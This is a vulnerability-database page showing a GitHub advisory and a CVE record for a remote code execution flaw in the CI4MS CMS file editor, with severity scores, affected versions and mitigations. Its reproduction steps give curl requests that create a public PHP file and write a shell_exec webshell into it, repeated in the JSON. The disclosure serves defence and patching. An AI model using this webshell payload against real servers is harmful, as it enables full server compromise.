Vulnerability-Lookup

GHSA-GP56-F67F-M4PX

Vulnerability from github – Published: 2026-02-02 21:52 – Updated: 2026-02-03 16:03

Summary

CI4MS Vulnerable to Remote Code Execution (RCE) via Arbitrary File Creation and Save in File Editor

Details

Summary

A critical vulnerability has been identified in CI4MS that allows an authenticated user with file editor permissions to achieve Remote Code Execution (RCE). By leveraging the file creation and save endpoints, an attacker can upload and execute arbitrary PHP code on the server.

Vulnerability Details

The vulnerability exists in the /backend/fileeditor/createFile and /backend/fileeditor/save API endpoints.

Unrestricted File Creation: The createFile endpoint allows users to create files with any extension (including .php) in web-accessible directories such as /public.

Arbitrary Content Injection: The save endpoint allows users to write arbitrary content into the created files without sufficient server-side validation or sanitization.

An attacker can combine these two flaws to create a PHP webshell and execute system-level commands, leading to a complete compromise of the web server.

Impact

Successful exploitation allows:

Full access to the server's file system and databases.

Execution of arbitrary OS commands.

Permanent modification or deletion of application data.

Steps to Reproduce

Create a new PHP file in a public directory using the following request:

curl -X POST '[SERVER_URL]/backend/fileeditor/createFile' -d 'path=/public' -d 'name=exploit.php'

Inject a PHP payload into the file using the save endpoint:

curl -X POST '[SERVER_URL]/backend/fileeditor/save' -H 'Content-Type: application/json' -d '{"path":"/public/exploit.php","content":"<?php echo shell_exec($_GET[\"cmd\"]); ?>"}'

Access the file via the browser to execute commands: https://[SERVER_URL]/exploit.php?cmd=whoami

Suggested Mitigation

Path Validation: Restrict file operations to non-executable directories.

Extension Whitelisting: Strictly allow only safe file extensions (e.g., .css, .js, .txt) and block executable extensions like .php, .phtml, etc.

Content Sanitization: Implement server-side checks to prevent the injection of malicious code patterns.

Execution Prevention: Disable PHP execution in public/upload directories via server configuration (e.g., .htaccess or Nginx config).

Severity ?

9.9 (Critical)


                  
                    CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "ci4-cms-erp/ci4ms"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.28.5.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-25510"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-434",
      "CWE-94"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-02-02T21:52:58Z",
    "nvd_published_at": null,
    "severity": "CRITICAL"
  },
  "details": "**Summary**\n\nA critical vulnerability has been identified in CI4MS that allows an authenticated user with file editor permissions to achieve Remote Code Execution (RCE). By leveraging the file creation and save endpoints, an attacker can upload and execute arbitrary PHP code on the server.\n\n**Vulnerability Details**\n\nThe vulnerability exists in the /backend/fileeditor/createFile and /backend/fileeditor/save API endpoints.\n\nUnrestricted File Creation: The createFile endpoint allows users to create files with any extension (including .php) in web-accessible directories such as /public.\n\nArbitrary Content Injection: The save endpoint allows users to write arbitrary content into the created files without sufficient server-side validation or sanitization.\n\nAn attacker can combine these two flaws to create a PHP webshell and execute system-level commands, leading to a complete compromise of the web server.\n\n**Impact**\n\nSuccessful exploitation allows:\n\nFull access to the server\u0027s file system and databases.\n\nExecution of arbitrary OS commands.\n\nPermanent modification or deletion of application data.\n\nSteps to Reproduce\n\nLog in to an account with permissions to use the file editor.\n\nCreate a new PHP file in a public directory using the following request:\n\n```\ncurl -X POST \u0027[SERVER_URL]/backend/fileeditor/createFile\u0027 -d \u0027path=/public\u0027 -d \u0027name=exploit.php\u0027\n```\n\nInject a PHP payload into the file using the save endpoint:\n\n```\ncurl -X POST \u0027[SERVER_URL]/backend/fileeditor/save\u0027 -H \u0027Content-Type: application/json\u0027 -d \u0027{\"path\":\"/public/exploit.php\",\"content\":\"\u003c?php echo shell_exec($_GET[\\\"cmd\\\"]); ?\u003e\"}\u0027\n```\n\nAccess the file via the browser to execute commands: https://[SERVER_URL]/exploit.php?cmd=whoami\n\nSuggested Mitigation\n\nPath Validation: Restrict file operations to non-executable directories.\n\nExtension Whitelisting: Strictly allow only safe file extensions (e.g., .css, .js, .txt) and block executable extensions like .php, .phtml, etc.\n\nContent Sanitization: Implement server-side checks to prevent the injection of malicious code patterns.\n\nExecution Prevention: Disable PHP execution in public/upload directories via server configuration (e.g., .htaccess or Nginx config).",
  "id": "GHSA-gp56-f67f-m4px",
  "modified": "2026-02-03T16:03:24Z",
  "published": "2026-02-02T21:52:58Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-gp56-f67f-m4px"
    },
    {
      "type": "WEB",
      "url": "https://github.com/ci4-cms-erp/ci4ms/commit/86be2930d1c54eb7575102563302b2f3bafcb653"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/ci4-cms-erp/ci4ms"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "CI4MS Vulnerable to Remote Code Execution (RCE) via Arbitrary File Creation and Save in File Editor"
}

CVE-2026-25510 (GCVE-0-2026-25510)

Vulnerability from cvelistv5 – Published: 2026-02-03 21:17 – Updated: 2026-02-03 21:17

Title

CI4MS Vulnerable to Remote Code Execution (RCE) via Arbitrary File Creation and Save in File Editor

Summary

CI4MS is a CodeIgniter 4-based CMS skeleton that delivers a production-ready, modular architecture with RBAC authorization and theme support. Prior to version 0.28.5.0, an authenticated user with file editor permissions can achieve Remote Code Execution (RCE) by leveraging the file creation and save endpoints, an attacker can upload and execute arbitrary PHP code on the server. This issue has been patched in version 0.28.5.0.

Severity ?

10 (Critical)


                        
                          CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

CWE

CWE-434 - Unrestricted Upload of File with Dangerous Type
CWE-94 - Improper Control of Generation of Code ('Code Injection')

Assigner

GitHub_M

References

URL

Tags

	https://github.com/ci4-cms-erp/ci4ms/security/adv…	x_refsource_CONFIRM
	https://github.com/ci4-cms-erp/ci4ms/commit/86be2…	x_refsource_MISC

Impacted products

	Vendor	Product	Version
	ci4-cms-erp	ci4ms	Affected: < 0.28.5.0

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "cna": {
      "affected": [
        {
          "product": "ci4ms",
          "vendor": "ci4-cms-erp",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 0.28.5.0"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "CI4MS is a CodeIgniter 4-based CMS skeleton that delivers a production-ready, modular architecture with RBAC authorization and theme support. Prior to version 0.28.5.0, an authenticated user with file editor permissions can achieve Remote Code Execution (RCE) by leveraging the file creation and save endpoints, an attacker can upload and execute arbitrary PHP code on the server. This issue has been patched in version 0.28.5.0."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 10,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "CHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-434",
              "description": "CWE-434: Unrestricted Upload of File with Dangerous Type",
              "lang": "en",
              "type": "CWE"
            }
          ]
        },
        {
          "descriptions": [
            {
              "cweId": "CWE-94",
              "description": "CWE-94: Improper Control of Generation of Code (\u0027Code Injection\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-02-03T21:17:02.849Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-gp56-f67f-m4px",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-gp56-f67f-m4px"
        },
        {
          "name": "https://github.com/ci4-cms-erp/ci4ms/commit/86be2930d1c54eb7575102563302b2f3bafcb653",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/ci4-cms-erp/ci4ms/commit/86be2930d1c54eb7575102563302b2f3bafcb653"
        }
      ],
      "source": {
        "advisory": "GHSA-gp56-f67f-m4px",
        "discovery": "UNKNOWN"
      },
      "title": "CI4MS Vulnerable to Remote Code Execution (RCE) via Arbitrary File Creation and Save in File Editor"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-25510",
    "datePublished": "2026-02-03T21:17:02.849Z",
    "dateReserved": "2026-02-02T18:21:42.486Z",
    "dateUpdated": "2026-02-03T21:17:02.849Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

GHSA-GP56-F67F-M4PX

CVE-2026-25510 (GCVE-0-2026-25510)

Tags

Sightings

Nomenclature